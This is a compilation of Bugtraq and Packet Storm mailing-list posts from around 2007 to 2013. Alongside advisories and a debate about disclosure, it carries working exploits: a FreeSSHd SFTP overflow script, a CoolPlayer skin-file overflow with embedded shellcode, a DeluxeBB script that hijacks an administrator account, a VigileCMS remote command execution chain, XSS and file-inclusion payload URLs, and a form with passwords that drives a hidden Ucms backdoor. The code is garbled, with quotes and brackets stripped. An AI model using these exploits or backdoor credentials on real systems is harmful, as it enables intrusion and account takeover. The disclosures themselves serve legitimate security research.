+-+
| DETAILS |
+-+

Oracle Java versions prior to 7u25 suffer from an invalid array indexing 
vulnerability that exists within the native storeImageArray() function inside 
jre/bin/awt.dll.  This vulnerability allows for remote code execution.
User interaction is required for this exploit in that the target must visit
a malicious page or open a malicious file.

+--+

+--+
| PROOF OF CONCEPT |
+--+

The full exploit code that pops calc.exe is available here:

http://packetstormsecurity.com/files/122777/

+--+

+---+
| RELATED LINKS |
+---+

http://www.oracle.com/technetwork/java/javase/7u25-relnotes-1955741.html

+--+


++
| SHAMELESS PLUG |
++

The Packet Storm Bug Bounty program gives researchers the ability to profit 
from their discoveries.  You can get paid thousands of dollars for one day 
and zero day exploits.  Get involved by contacting us at 
getp...@packetstormsecurity.com or visit the bug bounty page at: 

http://packetstormsecurity.com/bugbounty/



-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)

iEYEARECAAYFAlIIYEsACgkQrM7A8W0gTbFs0QCffnEpYjY5df7CO3eMnQQGnINg
jHMAn3eQUGgfWXg1nYMChmXpc7jKSm4m
=rLHj
-END PGP SIGNATURE-

Re: Vulnerabilities in some SCADA server softwares

[bugtraq]

  If *any* threat exists,
  that threat is increased by public exposure of unmitigated attack
  methodology
 
 I think you have it wrong.
 
 Public exposure increases the visibility, and therefore customers
 install the patches quicker.
 
 Without public visibility, they will keep running the old code.

Actually both are true.

More systems will be owned by these unmitigated issues since more attackers 
will be aware of their existence. While it is true
that others knew about these issues (always assume so), many more will know 
about them now, and more systems likely will be exploited. This was certainly 
the case when tavis published an unmitigated windows vuln 
http://www.theregister.co.uk/2010/06/30/windows_exploit_spike/ .

To your point people who 'are paying attention' will patch once a patch is 
available, and others who wouldn't normally know
will see this in the news and become more aware of the issue/s. I don't think 
people on this list are arguing that
the public shouldn't be made aware of problems in these devices, they are 
arguing that POC shouldn't be published for
unmitigated issues as it doesn't benefit users.

If you can provide real world statistics to the list demonstrating proof that 
people are safer by being aware of unmitigated
threats with working PoC's, please send it to the list. I don't ask this to 
flame you, I think that this is data that people 
would be genuinely interested in learning from.


Regards,
- Robert
http://www.qasec.com/
http://www.webappsec.org/

Packet Storm - New Site

[bugtraq]

Packet Storm Security Launches New Site
http://packetstormsecurity.org/

November 15, 2010 -  Today is the launch of a completely
new version of Packet Storm that has been long awaited 
and is long overdue.  The security community has given
us a lot of feedback during our design phase and we 
have attempted to integrate many features.  

As you may already know, Packet Storm is home to a 
massive security portal that houses news, whitepapers,
advisories, exploits and tools.  

It's a place to showcase your work, whether it be
a research advisory or a tool you wrote.  It's a 
place to check news headlines coming down the
wire or to find out about the latest vulnerabilities.

The goal of the new site is usability and integration.  
We realized that this community is missing a centralized
portal to appropriately promote their work and interact
with others in the community.  


The site currently hosts:

More than 38,000 advisories

More than 20,000 exploits

More than 5,000 tools

More than 2,000 whitepapers

Full historical view of releases - going all the way back to 1998.



New core features:

Trending for top author, popular topics and daily additions

Tagging exists all over the place

Commenting is allowed everywhere

RSS feeds are all over the place

Search Users, Files, News and Authors



Users:

Commenting, favorites and the ability to view the favorites of the people 
you follow.

CVE and OSVDB integration

Privacy settings for all personal information

You can send messages to other users

You can switch to a minimal listing view

You can set your primary mirror; we're on four continents

Share items with Facebook, Twitter, Digg, Reddit, LinkedIn, etc


Authors:

Your very own author page and author id.

Ability to add biographic information and a picture.

Authors ranked by releases per month 


If an already established author applies with the 
same email address as is stored in the archive,
their profile will be linked to their work on the site.

We expect some issues during this launch as we are in
a beta state, so please feel free to send feedback to
feedb...@packetstormsecurity.org if you have any issues.

Thanks,
The Staff
st...@packetstormsecurity.org
http://packetstormsecurity.org/

FreeSSHd Multiple Remote Stack Overflow Vulnerabilities

[writ3r-dont-want-bugtraq-spam-]

# FreeSSHd Multiple Remote Stack Overflow Vulnerabilities. 
#
# Version : 1.2.1
# Advisory: http://www.bmgsec.com.au/advisory/42/
#
# Discovered  written by: 
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
#
# After Jeremy Brown reported similar buffer overflow vulnerabilities in
# FreeSSHd I forgot about it, and stopped my research on the vulnerabilities.
# Anyway just now I noticed that other vulnerable functions had not been
# reported. So below is a small list, and a small proof of concept. 
# 
# Note: All below functions overwrite EDI register. 
# open (edi)
# unlink (edi)
# mkdir (edi)
# rmdir (edi)
# stat (edi)

use Net::SSH2;

my $user = root;
my $pass = yahh;

my $ip = 127.0.0.1;
my $port = 22;

my $ssh2 = Net::SSH2-new();

print [+] Connecting...\n;
$ssh2-connect($ip, $port) || die [-] Unable to connect!\n;
$ssh2-auth_password($user, $pass) || [-] Incorrect credentials\n;
print [+] Sending payload\n;

print $payload;
my $payload = A x 5000;

my $sftp = $ssh2-sftp();
$sftp-unlink($payload);

print [+] Sent;
$ssh2-disconnect;

CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit

[writ3r-dont-want-bugtraq-spam-]

/*
* CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit
*
* Advisory: http://www.bmgsec.com.au/advisory/43/
* Test box: WinXP Pro SP2 English
*
* Code reference is in skin.c, lines 464 - 480
*
* Written and discovered by:
* r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
*/

#include iostream
#include fstream
#include cstdlib //exit

using namespace std;

int main()
{
//win32_exec -  EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum 
http://metasploit.com
//Bad characters: 0x00, 0x0d, 0xf4
char scode[] =
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49
\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36
\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34
\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41
\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44
\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x53\x4b\x38\x4e\x57
\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38
\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x48
\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c
\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e
\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38
\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x30\x4b\x54
\x4b\x38\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58
\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43
\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x33\x45\x58\x42\x4c\x4a\x47
\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x47\x4e\x31\x4d\x4a
\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b
\x42\x50\x42\x50\x42\x30\x4b\x38\x4a\x36\x4e\x53\x4f\x35\x41\x53
\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57
\x42\x45\x4a\x46\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x46\x4a\x39
\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46
\x4e\x36\x43\x46\x50\x32\x45\x46\x4a\x37\x45\x46\x42\x30\x5a;

char buffer[1918];
char eip[] = \x27\x38\x03\x7d; //jmp esp

cout  [*] Generating payload\n;
strcpy(buffer, [CoolPlayer Skin]\nPlaylistSkin=);

int i;
for (i=0; i1534; i++)
buffer[31+i] = 'A';

for (i=0; isizeof(eip); i++)
buffer[1565+i] = eip[i];

for (i=0; isizeof(scode); i++)
buffer[1569+i] = scode[i];

ofstream outStream;
outStream.open(cp.ini);

outStream  buffer;

outStream.close();

cout  [+] Skin file created.\n;

return 0;
}

confirm subscribe to bugtraq@securityfocus.com

[bugtraq-help]

Hi! This is the ezmlm program. I'm managing the
bugtraq@securityfocus.com mailing list.

I'm working for my owner, who can be reached
at [EMAIL PROTECTED]

To confirm that you would like

   [EMAIL PROTECTED]

added to the bugtraq mailing list, please send
an empty reply to this address:

   [EMAIL PROTECTED]

Usually, this happens when you just hit the reply button.
If this does not work, simply copy the address and paste it into
the To: field of a new message.

This confirmation serves two purposes. First, it verifies that I am able
to get mail through to you. Second, it protects you in case someone
forges a subscription request in your name.

Some mail programs are broken and cannot handle long addresses. If you
cannot reply to this request, instead send a message to
[EMAIL PROTECTED] and put the
entire address listed above into the Subject: line.


--- Administrative commands for the bugtraq list ---

I can handle administrative requests automatically. Please
do not send them to the list address! Instead, send
your message to the correct command address:

For help and a description of available commands, send a message to:
   [EMAIL PROTECTED]

To subscribe to the list, send a message to:
   [EMAIL PROTECTED]

To remove your address from the list, just send a message to
the address in the ``List-Unsubscribe'' header of any list
message. If you haven't changed addresses since subscribing,
you can also send a message to:
   [EMAIL PROTECTED]

or for the digest to:
   [EMAIL PROTECTED]

For addition or removal of addresses, I'll send a confirmation
message to that address. When you receive it, simply reply to it
to complete the transaction.

If you need to get in touch with the human owner of this list,
please send a message to:

[EMAIL PROTECTED]

Please include a FORWARDED list message with ALL HEADERS intact
to make it easier to help you.

--- Enclosed is a copy of the request I received.

Return-Path: [EMAIL PROTECTED]
Received: (qmail 28055 invoked from network); 21 Jun 2008 06:25:37 -
Received: from mail.securityfocus.com (205.206.231.9)
  by lists2.securityfocus.com with SMTP; 21 Jun 2008 06:25:37 -
Received: (qmail 23133 invoked by alias); 21 Jun 2008 07:25:44 -
Received: (qmail 23088 invoked from network); 21 Jun 2008 07:25:43 -
Received: from www2.securityfocus.com (HELO securityfocus.com) (205.206.231.12)
  by mail.securityfocus.com with SMTP; 21 Jun 2008 07:25:43 -
Received: (qmail 10660 invoked by uid 500); 21 Jun 2008 06:32:06 -
Date: 21 Jun 2008 06:32:06 -
Message-ID: [EMAIL PROTECTED]
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Subscribe

[EMAIL PROTECTED]

Re: xt:Commerce possible DoS

[decoder-bugtraq]

With respect to my last post, the company behind the xt:Commerce shop software 
now has confirmed the security vulnerability in current versions and will 
provide a patch very soon.



Best regards,



Christian Holler

VisualSentinel 0.7 Cross Agent Scripting Vulnerability

[bugtraq]

VisualSentinel 0.7 Cross Agent Scripting


# Discovered by: Alfredo Panzera, Opencosmo Security

# Software vendor:   http://www.opencosmo.com

# Date:  31-05-2008


# Vulnerability:

The vulnerability consists on inject javascript code falsify the user agent's

attacker during an attack and then save in the log the user agent falsified.


# Vulnerable string:

$user_useragent = $_SERVER ['HTTP_USER_AGENT'];


# Solution:

The development team has promptly issued a patch the vulnerability.

You can download the latest version from the download page.

http://www.opencosmo.com/product-1.html



##


Opencosmo Security

http://www.opencosmo.com

xt:Commerce possible DoS

[decoder-bugtraq]

Hello,


I've found a suspicious behavior of the xt:Commerce shop software (only 
verified in their demo shop).


When entering  as a search query in the Quick Purchase field at the left 
side of the shop, I get:


Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 
8388611 bytes) in 
/is/htdocs/wp1052946_X4Y7B4PF21/www/includes/classes/class.inputfilter.php on 
line 136


This looks very much like a problem in the input filter that causes too much 
memory to be allocated (and that could of course be used for DoS)


Unfortunately, the source code is not available freely, so I cannot investigate 
this further. If anyone has the source code available, feel free to check out 
the specific region in the input filter.


I informed the company but they closed my ticket without any response, and even 
after I reopened it, there hasn't been any feedback for almost 2 weeks now.



Best regards,



Christian Holler

Sphider 1.3.4 Cross Site Scripting

[decoder-bugtraq]

-BEGIN PGP SIGNED MESSAGE-

Hash: SHA1


Sphider Cross Site Scripting Vulnerability


Original release date: 2008-04-29

Last revised: 2008-05-06

Latest version: http://users.own-hero.net/~decoder/advisories/sphider134-xss.txt

Source: Christian Holler http://users.own-hero.net/~decoder/



Systems Affected:


 Sphider 1.3.4 (http://www.sphider.eu/) - A PHP Search Engine


Severity: Moderate



Overview:


 Sphider is a search engine that has several features; one is a search 
suggestion

 feature as in Did you mean xyz? that corrects possible typos in your search,

 without however sanitizing this output. This feature is off by default, but

 turned on by many sites for convenience.


I. Description


 The output of the suggestion feature in Sphider does output the complete query

 if there is at least one word in this query that has the script has found a 

 possible correction for. This word is highlighted and the rest of the search

 query is returned as it is. However, this output is completely unsanitized,

 allowing HTML/Javascript to be included.


II. Impact


 Depending on the site where this search script is deployed, this attack can be

 used to steal cookies from other users by tricking them into visiting a given

 URL.


III. Proof of concept


 search.php?query=xsss%20%3Cscript%3Ealert('HELLO');%3C/script%3Esearch=1

 

 where the first word in the query, xsss is a word that can be corrected by

 the search script. This generally depends on the indexed site(s) but such a

 word is very easy to find.


IV. Solution


 Currently none, author has been informed.


Timeline:


 2008-04-29: Author informed

 2008-05-06: Vulnerability notice published


-BEGIN PGP SIGNATURE-

Version: GnuPG v2.0.6 (GNU/Linux)


iD8DBQFIIMGYJQIKXnJyDxURAm44AJ9JbT+63Krpg95BZatccKal29DhkwCgoAE9

eNhj/JgskwQVKgmdnFBEVG0=

=DZrL

-END PGP SIGNATURE-

mvnForum 1.1 Cross Site Scripting

[decoder-bugtraq]

-BEGIN PGP SIGNED MESSAGE-

Hash: SHA1


mvnForum Cross Site Scripting Vulnerability


Original release date: 2008-04-27

Last revised: 2008-05-06

Latest version: http://users.own-hero.net/~decoder/advisories/mvnforum-jsxss.txt

Source: Christian Holler http://users.own-hero.net/~decoder/



Systems Affected:


 mvnForum 1.1 (http://www.mvnforum.com/) - A Java J2EE/Jsp/Servlet forum


Severity: Moderate



Overview:


 An attacker who has the rights to start a new thread or to reply

 to an existing one, is able to include javascript code using the topic,

 that is executed when other users use the quick reply button shown

 for every post.


 This point of injection is possible because the topic text is part

 of an onclick event used for the quick reply function and the 

 software only escapes characters that are typical for HTML cross

 site script attacks. In this case, the single quote character is not

 escaped.


I. Description


 The list of standard functions for threads includes a typical feature

 called quick reply. For user convenience, each post has a button that

 jumps to the form field allowing to send a quick reply, whilst changing

 the topic text of the reply at the top of this form. This is accomplished

 using javascript and the topic that is replied to. The source code for

 this button looks like this:


 a href=#message onclick=QuickReply('24','Re: Some thread topic');

 img src=/forum/mvnplugin/mvnforum/images/icon/button_quick_reply.gif

  border=0 alt=Quick reply to this post title=Quick reply to this post 
//a


 Because single quotes are not escaped in the topic context, it is possible

 to break out of the second argument and execute arbitrary javascript code

 in the client's browser.


II. Impact


 Any user that is allowed to post anywhere can use this flaw to steal

 sensitive information such as cookies from other users. Especially

 because the forum uses simple reusable MD5 hashes in their cookies,

 this attack makes it possible to gain unauthorized access to other

 user accounts.


 However, this attack relies on the user to click the quick reply

 button and should therefore be considered only a moderate risk.


III. Proof of concept


 Creating a new thread or replying to a thread with the following subject

 will demonstrate the problem after hitting the quick reply button above

 the post text.

 

 Test', alert('XSS ALERT') , '



IV. Solution


 At the time of writing, a fix is available in CVS.

 
http://mvnforum.cvs.sourceforge.net/mvnforum/mvnforum/srcweb/mvnplugin/mvnforum/user/viewthread.jsp?r1=1.316r2=1.317


Timeline:


 2008-04-27: mvnForum authors informed

 2008-05-01: Fix available in CVS

 2008-05-06: Vulnerability notice published


-BEGIN PGP SIGNATURE-

Version: GnuPG v2.0.6 (GNU/Linux)


iD8DBQFIIMEXJQIKXnJyDxURAlOPAJ96XH9zfjLJ1jMjCCpheurxwJuqMACfbz2S

FWggJDc19FDPXiiyS+AP9iU=

=Tixo

-END PGP SIGNATURE-

OneSecurityDay 2008 - Web application auditing challenge

[bugtraq]

 Translation by Google Translate 


This Opencosmo Security has organizato the OneSecurityDay event held each year. 
The event is dedicated to all the lovers of play of web application wishing to 
compete with other auditors from around the world.


For those who do not know, OneSecurityDay to find vulnerabilities in PHP 
applications / mySQL in order to violate the protections and access as an 
administrator.

The winner not only find his name on the flyer next year, will win a prize 
300Fr .- (200 €)


To participate just send an e-mail to [EMAIL PROTECTED] with its data combined 
the method of payment:

Name:

Surname:

Nickname:

E-mail:

At the time of response from a staff member of Opencosmo, will be given an ID 
that will identify the attacker. This ID will be implemented in the index 
deface.

(You can choose the payment method when vincità)


The regulation is very simple; participating You agree to the following terms 
in its entirety. In case you had not agree you can not attend the event.


REGULATION

It is prohibited

1.1 - Use the space made available to commit acts of abuse such as:

 * Sending spam messages.

 * Distribution of viruses, and pedoporngrafico warez material.

 * Or any illegal act

1.2 - Distribute source CMS available to attack. In any case, the staff 
rilascierà them.

1.3 - Using programs for finding vulnerabilities as Acunetix.

1.4 - Insultare or disturb other competitors.

1.5 - Attach parts of the site is not required.

1.6 - To win the prize, the competitor must delete each file CMS and leave the 
index with its written identification number.


About VisualSentinel

VisualSentinel is an application written in PHP that blocks XSS attacks, RFI / 
LFI and SQL injection. During an attack alerts the administrator via e-mail and 
saving a log file with IP, Browser and string attack.

As an application very lean but powerful at the same time, competitors will 
release its fantastia and its software to be able to bypass the security 
controls of sentinel.


About OneSecurityDay 2008

The event will be held on April 18, 2008 at 21:00 and each competitor will be 
given the link to begin the attack, the first that will violate the sentinel 
and delete all files leaving the index with their ID will be the winner .


The prize will be sent depending on the method of payment agreed with the 
winner at the time of registration.


For more details send an e-mail to [EMAIL PROTECTED]



Mario Pasini

Manager OneSecurityDay 2008

Http://www.opencosmo.com

phpBB2 2.0.22 Cross Site Scripting Vulnerability

[bugtraq]

Opencosmo Security

http://www.opencosmo.com


Author: Alfredo Panzera, Opencosmo Security

Vendor: phpBB.com

Version: 2.0.22


Exploit: 

Go to http://[website]/forum/admin/admin_groups.php and into 'Group 
description:' insert your XSS. 

[XSS] OpenNewsletter v2.5 Multipe XSS Attacks

[bugtraq]

Software: OpenNewsletter

Homepage: http://www.selfexile.com/projects/opennewsletter

Affected version: v2.5 and below

Overview: OpenNewsletter si a free, simple, and beautiful
open source newsletter solution aimed at small-medium scale.

Attack:

A non-existant sanitization when parsing the PHP value 'type'
on 'compose.php', leads to some XSS attacks.

PoC:

http://www.vulnhost.com/path/to/opennewsletter/compose.php?type=html'%3Ch1%3EXSS!%3C/h1%3E
http://www.vulnhost.com/path/to/opennewsletter/compose.php?type=';%3CSCRIPT%3Ealert(String.fromCharCode(88,%2083,%2083,%2032,%2058,%2040))//\';%3C/script%3E

Solution: not aware of at 12/6/2007.

Credits: Manu ([EMAIL PROTECTED])




This message was sent using IMP, the Internet Messaging Program.

DeluxeBB E-Mail Address Change Security Bypass

[bugtraq]

http://www.opencosmo.com

http://www.opencosmo.com/news.php?readmore=21


###


DeluxeBB E-Mail Address Change Security Bypass

Crediti: Nexen

Applicazione: DeluxeBB

Versione: 1.09

Impatto: Security Bypass

Rischio: [3/5]


Exploit: #!/usr/bin/python

#-*- coding: iso-8859-15 -*-

'''

_ __ _ _ _ __

| '_ \ / _ \ \/ / _ \ '_ \

| | | | __/  __/ | | |

|_| |_|\___/_/\_\___|_| |_|




§ DeluxeBB 0day Remote Change Admin's credentials §



nexen



PoC / Bug Explanation:

When you update your profile,

DeluxeBB execute a vulnerable query:


$db-unbuffered_query(UPDATE .$prefix.users SET email='$xemail', 
msn='$xmsn', icq='$xicq', ... WHERE (username='$membercookie'));


So, editing cookie membercookie you can change remote user's email.


Enjoy ;)




'''



import httplib, urllib, sys, md5

from random import randint

print 
\n

print  DeluxeBB = 1.09 Remote Admin's/User's Email Change 

print  

print  Vulnerability Discovered By Nexen 

print  Greetz to The:Paradox that Coded the Exploit. 

print  

print  Usage: 

print  %s [Target] [VictimNick] [Path] [YourEmail] [AdditionalFlags]  % 
(sys.argv[0])

print  

print  Additional Flags: 

print  -id34 -passMypassword -port80 

print  

print  Example: 

print  python %s 127.0.0.1 admin /DeluxeBB/ [EMAIL PROTECTED] -port81  % 
(sys.argv[0])

print  

print 
\n

if len(sys.argv)=4: sys.exit()

else: print [.]Exploit Starting.


target = sys.argv[1]

admin_nick = sys.argv[2]

path = sys.argv[3]

real_email = sys.argv[4]


botpass = the-new-administrator

rand = randint(1, 9)

dn1 = 0

dn2 = 0

dn3 = 0


try:

for line in sys.argv[:]:

if line.find('-pass') != -1 and dn1 == 0:

upass = line.split('-pass')[1]

dn1 = 1

elif line.find('-pass') == -1 and dn1 == 0:

upass = 

if line.find('-id') != -1 and dn2 == 0:

userid = line.split('-id')[1]

dn2 = 1

elif line.find('-id') == -1 and dn2 == 0:

userid = 


if line.find('-port') != -1 and dn3 == 0:

port = line.split('-port')[1]

dn3 = 1

elif line.find('-port') == -1 and dn3 == 0:

port = 80

except:

sys.exit([-]Some error in Additional Flag.)

if upass== and userid !=  or userid ==  and upass != :

print [-]Bad Additional flags -id -pass given, ignoring them.

upass=

userid=

Trying
 to connect.

try:

conn = httplib.HTTPConnection(target,port)

conn.request(GET, )

except: sys.exit([-]Cannot connect. Check Target.)

Registering
 a new user if id or upass not defined

try:

conn = httplib.HTTPConnection(target,port)

if upass ==  or userid == :

conn.request(POST, path + misc.php?sub=register, 
urllib.urlencode({'submit': 'Register','name': 'th331337.%d' % (rand) , 'pass': 
botpass,'pass2': botpass,'email': '[EMAIL PROTECTED]' % (rand) }), {Accept: 
text/plain,Content-type: application/x-www-form-urlencoded})

response = conn.getresponse()

cookies = response.getheader('set-cookie').split(;)

#print \n\nth331337.%d \n\nthe-new-administrator % (rand)

print [.]Registering a new user. --,response.status, response.reason

conn.close()

Getting
 memberid in Cookies

for line in cookies[:]:

if line.find('memberid') != -1:

mid = line.split('memberid=')[1]

Isset
 like starts

try: mid

except NameError: sys.exit([-]Can't Get \memberid\. Failed. Something has 
gone wrong. If you have not done yet, you may have to register manually and use 
flags -id -pass)

except AttributeError:

sys.exit([-]AttributeError Check your Target/path.)

Doing
 some Md5

if upass== or userid==:

hash = md5.new()

hash.update(botpass)

passmd5 = hash.hexdigest()

else:

hash = md5.new()

hash.update(upass)

passmd5 = hash.hexdigest()

mid = userid

Updating
 victim email in Profile

conn = httplib.HTTPConnection(target,port)

conn.request(POST, path+cp.php?sub=settings, urllib.urlencode({'submit': 
'Update','xemail': real_email}), {Accept: text/plain,Cookie: 
memberid=+mid+; 

VigileCMS = 1.8 Stealth Remote Command Execution Exploit

[bugtraq]

Opencosmo Security

http://www.opencosmo.com

http://www.opencosmo.com/news.php?readmore=15



VigileCMS = 1.8 Stealth Remote Command Execution Exploit

Crediti: The:Paradox

Applicazione: VigileCMS

Versione: 1.8

Impatto: Remote Command Execution

Rischio: [3/5]


Exploit: #!/usr/bin/python

#-*- coding: iso-8859-15 -*-

'''

_ _ _

| |_| |_ ___ _ _ __ __ _ _ _ __ _ __| |_ __

| _| ' \/ -_)|_|| '_ \/ _` | '_/ _` / _` / _ \ \ /

\__|_||_\___||_|| .__/\__,_|_| \__,_\__,_\___/_\_\

|_|



This is a Public Exploit. 22/10/2007 (dd-mm-)



§ 0day VigileCMS 1.8 Stealth and maybe lower version - Remote Command 
Execution §

Vendor: http://www.vigilenapoletano.it

Severity: Highest

Author: The:Paradox

Italy r0x.


Visit inj3ct-it.org


Comments: This exploit was coded to show some people what a real vulnerability 
is.



Related Codes:


--- index.php; line 64:


if (isset($_COOKIE[rem_user]) and isset ($_COOKIE[rem_pass]) and 
!isset($_SESSION[user])) {

if(file_exists(USERS_TAB./$_COOKIE[rem_user].$_COOKIE[rem_pass].php)){

$_SESSION[user] = $_COOKIE[rem_user];

$_SESSION[pass] = $_COOKIE[rem_pass];

logthis($_SESSION[user] si è collegato al Sito: riconosciuto con Cookie!);

UserVisita ();// aggiornamento database utente per numero di visite

}

}


--- func.inc.php; line 93:


function is_admin(){ //## FUNCTION ##

if( (isset($_SESSION[user]) and isset($_SESSION[pass]))  
(file_exists(ADMIN_TAB./$_SESSION[user].$_SESSION[pass].php)) ){

return true;

} else {

return false;

}

}


--- func.inc.php; line 109:


function is_superadmin(){ //## FUNCTION ##

include (LOGS_TAB./creazione.php);

if (isset($_SESSION[user]) and isset($_SESSION[pass]) and 
($_SESSION[user]==$primo_amministra)) {

return true;

} else {

return false;

}

}


--- vedipm.php; line 210:


if ($_POST[ttl] ==) $_POST[ttl]=Nessun oggetto;


$_POST[ttl] =stripslashes($_POST[ttl]);

$_POST[ttl] =htmlspecialchars($_POST[ttl]); // impedisce visualizzazioni 
caratteri html e maligni tipo javascript

$_POST[cont]=stripslashes($_POST[cont]);

$_POST[cont]=htmlspecialchars($_POST[cont]); // impedisce visualizzazioni 
caratteri html e maligni tipo javascript

$_POST[cont]=str_replace(\r\n,[br],$_POST[cont]);

$_POST[cont]=str_replace(~,|,$_POST[cont]);

$_POST[ttl]=str_replace(~,|,$_POST[ttl]);


$time = time();


$newpm = fopen (PM_TAB./$_POST[to], a);

fwrite ($newpm, 
$_POST[ttl]~$_POST[cont]~$_SESSION[user]~$time~non_letto\r\n);

fclose($newpm);



Bug Explanation:


The platform presents some vulnerabilities in the login system and in the 
private message sender system.

The first vulnerability is in index.php that verifies the login without sql 
database verifying the existence of files with the structure 
Nick.HashMD5Password.php in a dir db.

The cms'coder didn't thought about directory transversal. In fact if we try to 
login with these cookies:


rem_user = /../users/Nick

rem_pass = HashMD5Password


Where Nick and HashMD5Password are an existent UserName and MD5 Password's 
Hash, we'll gain administration rights. This happens because the function 
is_admin will check the file existence of 
/db/admin/../users/Nick.HashMD5Password.php

Obvious this may work with any file (with some collateral errors because it 
missed an include :P)

Whatever this doesn't make us able to do a lot of action in control panel 
because we will not have superadmin rights (see is_superadmin() function)

The second vulnerability is in vedipm.php and make us able to write a file on 
the server, but we can't get a RCE because our action are limited by 
htmlspecialchars that changes characters of php code ( ). Whatever 
$_SESSION[user] is not htmlspecialcharsed.

Using the first and the second vulnerability we can gain a RCE. We will create 
a file named with php code , with this we'll login and get an evil 
$_SESSION[user] that will be written in a php file.



A lot of other Vulnerabilities have been found in this platform, but their 
functionality depends by the configuration OFF of MAGIC QUOTES or other uses of 
vulnerabilities I explained , so they were not published.



Google Dork- Powered by Cms Vigile



Use this exploit at your own risk. You are responsible for your own deeds.

Not tested on version  of 1.6

TalkBack 2.2.7 Multiple Remote File Inclusion Vulnerabilities

[bugtraq]

Opencosmo Security

http://www.opencosmo.com


==

# TalkBack 2.2.7 Remote File Include Vulnerability


Software  : TalkBack version 2.2.7

Developer : http://www.scripts.oldguy.us/talkback

Discovered by : NoGe

Contact   : pace[dot]noge[at]hotmail[dot]com

  

==



# Vulnerable file

  

comments-display-tpl.php


line 35 include $language_file;

line 172 include $config['comments_form_tpl'];


addons/separate-comments-mod/my-comments-display-tpl.php


line 35 include $language_file;




# Exploit


http://localhost/path/comments-display-tpl.php?language_file=[evilcode]


http://localhost/path/comments-display-tpl.php?config[comments_form_tpl]=[evilcode]


http://localhost/path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=[evilcode]



==


# Greetz


all crew #papuahacker #baliemhackerlink #nyubicrew

skulmatic olibekas ulga Cungkee nyubi k1tk4t bius SiKodoQ newbie

yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ Fluzy str0ke

http://kapukvalley.net member


==

Ucms = 1.8 Backdoor Remote Command Execution Exploit

[bugtraq]

Opencosmo Security

http://www.opencosmo.com


##


html

!--

##

##

#  Ucms 1.4, 1.7, 1.8+?all   #

#Non Public exploit  #

#   by 2²hot²2 a.k.a D4m14n  #

#   and shadowleet   #

# Contact: [EMAIL PROTECTED]   #

# Or #

# [EMAIL PROTECTED]   #

##

Short description:

Ucms is a warez-cms coded by madmax,

he selled the cms for 150 Euro for one cms,

but it´s not enough that the cms costs 150 euro,

he added a secret backdoor which now is released...

Used by:

Famous warez-sites like alphawarez, loud, oxygen-warez and so on...

___


Backdoor in file:

/php/modules/entries/search.cache.inc.php

line 8:

$cache_path = '/search/' . GetValidFilename($search_term) . '_' . $search_hash 
. '_info.dat';

if(@stripslashes($_POST['p']) == 'ZCShY8FjtEhIF8LZ')[EMAIL 
PROTECTED](@stripslashes($_POST['e']));exit;};

the second string is hidden at the very right site with whitespaces in the 
texteditor, so nobody had seen it before,

the function is called in:

/php/modules/entries/search.main.inc.php

exploit:

--


head

titleUcms v. 1.8 Np exploit/title

script type=text/javascript

function sethost(seite)

{

document.host.action = seite + 'index.php?q=teste=1';

document.all.data.innerHTML =  document.host.action;

}

/script

/head

body onLoad=sethost('http://www.ucmspage.de/') 

h1Ucms v. 1.8 Np exploit/h1

Actual Request:div id=data/div

br /

Host:input type=text value=http://www.ucmspage.de/; 
onKeyUp=sethost(this.value); /

form id=host name=host action=http://www.ucmspage.de/; method=POST

Password:input type=text name=p value=ZCShY8FjtEhIF8LZbr /

!--

Additional info:

You need a password to activate the backdoor we found these passwords:

ZCShY8FjtEhIF8LZ (UCMS 1.8)

mYM1NHtWtZk2KwrF (UCMS 1.4)

wVCQUyhTga5Nmft1 (UCMS [?])

Just go into the file or similar files to find the passwords,

 for every version there is another password

--

 

Phpcode:br /

textarea name=e rows=20 cols=100

phpinfo(); ?

/textarea

br /

input type=submit value=exploit

/form

/body


!--

It´s just a crime to do such thigs, so please use

this exploit just for knowledge and not to destroy the warez pages...

thank you for you attention...

Have a nice day

--


/html

SkyPortal vRC6 Multiple Remote Vulnerabilities

[bugtraq]

Opencosmo Security

www.opencosmo.com


## WwW.BugReport.ir 
###

#

#  BugReport Security Research  Penetration Testing Group

